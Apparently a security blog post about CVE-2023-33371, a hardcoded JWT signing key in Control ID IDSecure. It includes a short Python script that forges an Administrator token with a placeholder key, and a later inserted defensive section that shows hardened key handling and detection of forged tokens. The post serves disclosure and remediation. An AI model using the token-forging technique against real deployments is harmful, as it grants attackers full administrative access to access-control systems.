CVE-2023-33371 is a newly disclosed critical vulnerability in Control ID IDSecure version 4.7.26 and earlier. The core issue? The software uses a hardcoded cryptographic key to sign and verify JWT session tokens. Because the key is the same on every installation, anyone who learns it can mint tokens the system accepts, bypassing authentication altogether. In this post, we'll break down the vulnerability, show how the bypass works, and point you to more resources.

What Is Control ID IDSecure?

Control ID IDSecure is an access control and identity management platform used by companies to manage physical and logical access to their premises and systems. It uses JSON Web Tokens (JWTs) for authentication and session management.

Hardcoded JWT Key

Control ID IDSecure uses a secret key to sign JWTs, so that only tokens it created are accepted as authentic. But version 4.7.26 and below ship with that secret built right into the code, the same key on every installation. This is called a hardcoded cryptographic key, and it's a big no-no for security: the secret that the whole authentication scheme depends on is available to anyone who can read the software.

If attackers know this key, they can create their own JWTs with any identity or permissions they want, and the system will treat them as legitimate.

Let’s say the key is

super_secret_idsecure_key

*NOTE: This is a placeholder; the real key may differ, but it is fixed across all installations up to and including v4.7.26.*

Step 2: Generate a Malicious JWT

Using a JWT library such as Python's PyJWT, an attacker who knows the key can generate a token with any user ID or role.

import time
import jwt  # pip install pyjwt

# The hardcoded secret key from IDSecure 4.7.26 (placeholder value, see note above)
secret = 'super_secret_idsecure_key'

# Payload can impersonate any user; exp must be a Unix timestamp in the future
payload = {
    "user_id": "admin",
    "role": "Administrator",
    "exp": int(time.time()) + 3600  # valid for one hour from now
}

# Sign the JWT with HS256 using the same key the server uses to verify it
token = jwt.encode(payload, secret, algorithm='HS256')
print(token)

This token can now be used as a session cookie or header for API requests, and the server will treat it as genuine.

Step 3: Bypass Authentication

By presenting the forged JWT in an Authorization header or as a session cookie, the attacker is treated as an administrator, or as any other user named in the payload.

Example HTTP Header

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

Impact

- Complete authentication bypass: Any user, including admins, can be impersonated.
- System compromise risk: Attackers can take full control of the application, modify configurations, and access sensitive data.

References

- NIST NVD: CVE-2023-33371
- Exploit Details on Exploit-DB (Example for similar JWT auth bypass)
- OWASP JWT Cheat Sheet
- Control ID Product Page

Remediation

- Upgrade to a patched version of IDSecure where the key is not hardcoded and can be configured securely per installation.
- After upgrading, rotate the JWT signing key, so that tokens forged with the old hardcoded key are no longer accepted.
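To make the "Hardcoded JWT Key" section and the remediation concrete, here is an added example (not code from the post or from Control ID) that implements HS256 JWT signing and verification with the Python standard library only. It contrasts the vulnerable pattern (a key literal in source) with the hardened one (a per-installation key loaded from configuration, with a minimum length and a refusal to run with a known leaked value), and includes a check a defender can run over incoming tokens to flag ones signed with the leaked key. The key value, the `IDSECURE_JWT_KEY` variable name and the payload fields are assumptions, not values from the product.

```python
import base64
import hashlib
import hmac
import json
import os
import secrets
import time
from typing import Optional

# Vulnerable pattern: a key literal in source code. This is the post's
# placeholder value, not the product's real key; it stands in for any
# secret that is identical on every installation.
LEAKED_PLACEHOLDER_KEY = b"super_secret_idsecure_key"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(payload: dict, key: bytes) -> str:
    """Build a compact JWT: base64url(header).base64url(payload).base64url(HMAC-SHA256)."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (
        _b64url(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + _b64url(json.dumps(payload, separators=(",", ":")).encode())
    )
    sig = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def signature_valid(token: str, key: bytes) -> bool:
    """True if the token's HS256 signature verifies under `key` (expiry not checked)."""
    try:
        h64, p64, s64 = token.split(".")
        header = json.loads(_b64url_decode(h64))
        # Pin the algorithm server-side; never let the token choose it.
        if header.get("alg") != "HS256":
            return False
        expected = hmac.new(key, f"{h64}.{p64}".encode("ascii"), hashlib.sha256).digest()
        return hmac.compare_digest(expected, _b64url_decode(s64))
    except ValueError:  # bad split, bad base64 or bad JSON
        return False


def verify_hs256(token: str, key: bytes, now: Optional[int] = None) -> Optional[dict]:
    """Return the payload if signature and expiry check out, otherwise None."""
    if not signature_valid(token, key):
        return None
    try:
        payload = json.loads(_b64url_decode(token.split(".")[1]))
        now = int(time.time()) if now is None else now
        if payload["exp"] <= now:
            return None
    except (KeyError, TypeError, ValueError):
        return None
    return payload


def load_signing_key(env_var: str = "IDSECURE_JWT_KEY") -> bytes:
    """Hardened pattern: per-installation key from configuration, never a default."""
    raw = os.environ.get(env_var)
    if not raw:
        raise RuntimeError(f"{env_var} is not set; refusing to start with a built-in key")
    key = raw.encode("utf-8")
    if len(key) < 32:
        raise RuntimeError("HS256 key must be at least 256 bits; generate one with secrets.token_hex(32)")
    if hmac.compare_digest(key, LEAKED_PLACEHOLDER_KEY):
        raise RuntimeError("JWT signing key matches a known leaked value; rotate it")
    return key


def signed_with_leaked_key(token: str) -> bool:
    """Detection aid: a token that verifies under the leaked key was either forged
    or issued before rotation; either way it should be rejected and logged."""
    return signature_valid(token, LEAKED_PLACEHOLDER_KEY)


if __name__ == "__main__":
    os.environ.setdefault("IDSECURE_JWT_KEY", secrets.token_hex(32))
    key = load_signing_key()
    good = sign_hs256({"user_id": "alice", "role": "User", "exp": int(time.time()) + 3600}, key)
    forged = sign_hs256({"user_id": "admin", "role": "Administrator", "exp": 2000000000},
                        LEAKED_PLACEHOLDER_KEY)
    print("legitimate token accepted:", verify_hs256(good, key) is not None)
    print("forged token accepted:", verify_hs256(forged, key) is not None)
    print("forged token matches leaked key:", signed_with_leaked_key(forged))
```

Run as a script it prints `True`, `False`, `True`: a token forged with the shared key verifies only on a server that still uses that key, and `signed_with_leaked_key` gives you a cheap signal to alert on during and after rotation.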

Conclusion

CVE-2023-33371 is a textbook example of how hardcoding secret cryptographic keys leads to catastrophic vulnerabilities. It hands attackers their own keys to the kingdom. If you use Control ID IDSecure 4.7.26 or lower, you must update and rotate your keys ASAP.

Timeline

Published on: 08/03/2023 01:15:00 UTC
Last modified on: 08/05/2023 03:47:00 UTC